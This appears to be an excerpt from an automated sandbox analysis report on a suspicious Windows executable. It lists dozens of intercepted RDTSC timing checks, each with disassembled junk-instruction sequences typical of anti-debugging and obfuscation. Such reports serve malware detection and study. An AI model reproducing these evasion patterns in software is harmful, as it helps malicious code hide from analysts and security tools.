Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CE9E0 second address: 9CE9F5 instructions: 0x00000000 rdtsc 0x00000002 jne 00007F6E9D0B353Ah 0x00000008 push ecx 0x00000009 jng 00007F6E9D0B3536h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CF059 second address: 9CF074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jc 00007F6E9CE04426h 0x0000000d popad 0x0000000e pushad 0x0000000f push edi 0x00000010 pop edi 0x00000011 jnl 00007F6E9CE04426h 0x00000017 push ecx 0x00000018 pop ecx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CF074 second address: 9CF09C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007F6E9D0B353Ch 0x0000000e push eax 0x0000000f jmp 00007F6E9D0B3541h 0x00000014 pop eax 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CF936 second address: 9CF94F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE0442Dh 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F6E9CE04426h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CF94F second address: 9CF953 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CFA9C second address: 9CFAA5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9CFBDE second address: 9CFBF8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3543h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D4676 second address: 9D46B7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edi 0x0000000a jmp 00007F6E9CE04439h 0x0000000f pop edi 0x00000010 mov eax, dword ptr [esp+04h] 0x00000014 push eax 0x00000015 jmp 00007F6E9CE0442Ch 0x0000001a pop eax 0x0000001b mov eax, dword ptr [eax] 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 jg 00007F6E9CE04426h 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D46B7 second address: 9D46DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3544h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b popad 0x0000000c pop esi 0x0000000d popad 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 pushad 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D46DC second address: 9D46E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D2F95 second address: 9D2F9A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D47EF second address: 9D47F3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D47F3 second address: 9D47F9 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D47F9 second address: 9D480D instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [eax] 0x0000000a push eax 0x0000000b push edx 0x0000000c jnl 00007F6E9CE04428h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D480D second address: 9D483B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 ja 00007F6E9D0B3536h 0x00000009 jmp 00007F6E9D0B353Bh 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 push eax 0x00000016 push edx 0x00000017 push esi 0x00000018 jmp 00007F6E9D0B353Fh 0x0000001d pop esi 0x0000001e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D4980 second address: 9D4984 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D4984 second address: 9D498A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D6DF4 second address: 9D6E29 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E9CE0442Eh 0x00000008 jmp 00007F6E9CE0442Fh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007F6E9CE04430h 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D6E29 second address: 9D6E52 instructions: 0x00000000 rdtsc 0x00000002 js 00007F6E9D0B3536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b je 00007F6E9D0B3536h 0x00000011 jmp 00007F6E9D0B3546h 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D6E52 second address: 9D6E57 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D6E57 second address: 9D6E6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9D0B3542h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9D6E6D second address: 9D6E71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 99EAA4 second address: 99EAAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007F6E9D0B3536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 99EAAE second address: 99EABC instructions: 0x00000000 rdtsc 0x00000002 ja 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 99EABC second address: 99EAC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 99EAC0 second address: 99EAC4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 99EAC4 second address: 99EACD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DAF94 second address: 9DAFB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F6E9CE04426h 0x0000000a jmp 00007F6E9CE0442Fh 0x0000000f popad 0x00000010 pushad 0x00000011 push edx 0x00000012 pop edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DAFB3 second address: 9DAFC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007F6E9D0B3536h 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DAFC2 second address: 9DAFC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB165 second address: 9DB16D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB555 second address: 9DB55B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB68D second address: 9DB69D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F6E9D0B3536h 0x0000000a popad 0x0000000b pushad 0x0000000c push esi 0x0000000d pop esi 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB69D second address: 9DB6AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a pop eax 0x0000000b jc 00007F6E9CE04426h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB6AE second address: 9DB6E4 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E9D0B3536h 0x00000008 jmp 00007F6E9D0B3549h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jns 00007F6E9D0B353Ch 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB6E4 second address: 9DB6EC instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB6EC second address: 9DB70B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9D0B3549h 0x00000009 pushad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB70B second address: 9DB726 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9CE04431h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DB726 second address: 9DB72A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD849 second address: 9DD855 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD855 second address: 9DD85C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD914 second address: 9DD918 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD918 second address: 9DD91E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD91E second address: 9DD933 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F6E9CE0442Ch 0x00000008 jno 00007F6E9CE04426h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 pushad 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD933 second address: 9DD93C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD93C second address: 9DD968 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov eax, dword ptr [esp+04h] 0x0000000f pushad 0x00000010 jne 00007F6E9CE0442Ch 0x00000016 jc 00007F6E9CE04428h 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [eax] 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DD968 second address: 9DD96C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DE596 second address: 9DE5ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 jmp 00007F6E9CE04432h 0x0000000a xchg eax, ebx 0x0000000b push 00000000h 0x0000000d push ecx 0x0000000e call 00007F6E9CE04428h 0x00000013 pop ecx 0x00000014 mov dword ptr [esp+04h], ecx 0x00000018 add dword ptr [esp+04h], 00000019h 0x00000020 inc ecx 0x00000021 push ecx 0x00000022 ret 0x00000023 pop ecx 0x00000024 ret 0x00000025 mov dword ptr [ebp+122D327Bh], ebx 0x0000002b nop 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F6E9CE04435h 0x00000033 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DE76B second address: 9DE76F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DEA9A second address: 9DEA9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DEA9E second address: 9DEAA2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DEAA2 second address: 9DEAB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F6E9CE04426h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DEAB1 second address: 9DEAC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 pushad 0x00000008 pushad 0x00000009 jnl 00007F6E9D0B3536h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DF043 second address: 9DF0C3 instructions: 0x00000000 rdtsc 0x00000002 je 00007F6E9CE04428h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], eax 0x0000000f push 00000000h 0x00000011 push eax 0x00000012 call 00007F6E9CE04428h 0x00000017 pop eax 0x00000018 mov dword ptr [esp+04h], eax 0x0000001c add dword ptr [esp+04h], 00000016h 0x00000024 inc eax 0x00000025 push eax 0x00000026 ret 0x00000027 pop eax 0x00000028 ret 0x00000029 pushad 0x0000002a mov esi, dword ptr [ebp+122D2EE1h] 0x00000030 sub bx, 3730h 0x00000035 popad 0x00000036 mov dword ptr [ebp+122D1D3Ah], eax 0x0000003c push 00000000h 0x0000003e mov dword ptr [ebp+122D243Dh], ecx 0x00000044 push 00000000h 0x00000046 push 00000000h 0x00000048 push eax 0x00000049 call 00007F6E9CE04428h 0x0000004e pop eax 0x0000004f mov dword ptr [esp+04h], eax 0x00000053 add dword ptr [esp+04h], 0000001Bh 0x0000005b inc eax 0x0000005c push eax 0x0000005d ret 0x0000005e pop eax 0x0000005f ret 0x00000060 mov dword ptr [ebp+122D1D3Ah], ebx 0x00000066 jnp 00007F6E9CE04426h 0x0000006c push eax 0x0000006d push eax 0x0000006e push edx 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DF0C3 second address: 9DF0C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DF0C7 second address: 9DF0CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DF0CB second address: 9DF0D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DFA3C second address: 9DFA42 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DF85E second address: 9DF864 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9DFA42 second address: 9DFA47 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E09F9 second address: 9E09FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E09FD second address: 9E0A07 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E0A07 second address: 9E0A11 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007F6E9D0B3536h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E158A second address: 9E1598 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 ja 00007F6E9CE04426h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E1E99 second address: 9E1E9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E12DA second address: 9E12F8 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F6E9CE04426h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F6E9CE04432h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E3332 second address: 9E333A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E3D4E second address: 9E3D8F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ebx 0x00000007 pushad 0x00000008 popad 0x00000009 pop ebx 0x0000000a popad 0x0000000b mov dword ptr [esp], eax 0x0000000e mov si, B983h 0x00000012 push 00000000h 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007F6E9CE04428h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000014h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e mov si, dx 0x00000031 push 00000000h 0x00000033 mov esi, dword ptr [ebp+122D2CF1h] 0x00000039 push eax 0x0000003a pushad 0x0000003b push eax 0x0000003c push edx 0x0000003d push edi 0x0000003e pop edi 0x0000003f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E3D8F second address: 9E3D93 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E7E92 second address: 9E7F13 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 jo 00007F6E9CE04447h 0x0000000e nop 0x0000000f jp 00007F6E9CE0442Ch 0x00000015 sub ebx, dword ptr [ebp+122D1D44h] 0x0000001b push 00000000h 0x0000001d push 00000000h 0x0000001f push esi 0x00000020 call 00007F6E9CE04428h 0x00000025 pop esi 0x00000026 mov dword ptr [esp+04h], esi 0x0000002a add dword ptr [esp+04h], 0000001Dh 0x00000032 inc esi 0x00000033 push esi 0x00000034 ret 0x00000035 pop esi 0x00000036 ret 0x00000037 push 00000000h 0x00000039 xchg eax, esi 0x0000003a jl 00007F6E9CE0443Fh 0x00000040 push eax 0x00000041 push edx 0x00000042 jmp 00007F6E9CE0442Dh 0x00000047 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E7F13 second address: 9E7F17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E30E9 second address: 9E3106 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F6E9CE04433h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9E3106 second address: 9E3114 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F6E9D0B3536h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EBBF8 second address: 9EBC14 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F6E9CE04438h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EEE3B second address: 9EEE65 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3549h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d jns 00007F6E9D0B3536h 0x00000013 pushad 0x00000014 popad 0x00000015 popad 0x00000016 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EFF48 second address: 9EFF4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EFF4C second address: 9EFF6C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F6E9D0B3546h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9EFF6C second address: 9F000B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop esi 0x00000006 nop 0x00000007 jmp 00007F6E9CE04439h 0x0000000c push 00000000h 0x0000000e jmp 00007F6E9CE04434h 0x00000013 jnc 00007F6E9CE04436h 0x00000019 push 00000000h 0x0000001b push 00000000h 0x0000001d push ebp 0x0000001e call 00007F6E9CE04428h 0x00000023 pop ebp 0x00000024 mov dword ptr [esp+04h], ebp 0x00000028 add dword ptr [esp+04h], 0000001Dh 0x00000030 inc ebp 0x00000031 push ebp 0x00000032 ret 0x00000033 pop ebp 0x00000034 ret 0x00000035 jmp 00007F6E9CE04431h 0x0000003a mov edi, dword ptr [ebp+122D1C8Ah] 0x00000040 xchg eax, esi 0x00000041 push eax 0x00000042 push edx 0x00000043 pushad 0x00000044 jmp 00007F6E9CE0442Ah 0x00000049 jg 00007F6E9CE04426h 0x0000004f popad 0x00000050 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F000B second address: 9F0012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\2oM46LNCOo.exe	RDTSC instruction interceptor: First address: 9F0012 second address: 9F0024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push edx 0x0000000b jno 00007F6E9CE04426h 0x00000011 pop edx 0x00000012 rdtsc
